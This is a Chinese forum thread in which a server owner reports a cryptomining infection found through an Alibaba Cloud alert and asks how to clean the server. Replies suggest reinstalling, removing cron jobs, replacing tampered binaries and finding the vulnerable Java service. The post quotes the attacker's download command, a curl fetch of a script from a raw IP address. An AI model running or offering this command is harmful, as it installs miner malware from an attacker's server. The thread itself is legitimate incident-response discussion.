这是一个创建于 1031 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天阿里云告警被植入挖矿病毒了,上去检查了一番看见运行了 curl 从他的服务器上拉了一个脚本,求大佬帮助,基于脚本内容该怎么修复服务器?
curl -fsSL http://192.210.200.66:1234/xmss
 |
1
JDog 2022-01-21 15:51:37 +08:00
不废话,直接重装
|
 |
2
mikeguan 2022-01-21 15:56:17 +08:00 via Android
通过这个脚本又学习了
把定时任务干掉,把任意命令执行的脚本删掉应该就差不多了。 最关键的是找到从什么地方进来的,你给的脚本并不能反映你系统漏洞在哪 |
 |
3
youngkingdom OP @JDog 服务太多了,重装成本过高😂。这是最后没有办法的办法了
|
|
4
youngkingdom OP @mikeguan 查看告警详情是通过 docker 启动的 java 服务,服务已经停了,已经在检查代码漏洞了。目前是想要解决服务器上的问题
|
|
5
youngkingdom OP 已找到相关样本分析,https://www.52 坡姐.cn/thread-1540889-1-1.html
|
 |
6
gadfly3173 2022-01-21 16:51:25 +08:00
可以考虑先用 sftp 之类的方式把 bash 之类的关键程序都换成干净的,然后检查下全服务器上所有最新修改的文件(如果它的脚本不会去伪造修改时间的话)然后再去看看从哪进来的。如果它会改时间的话还是重装吧
|
Select Language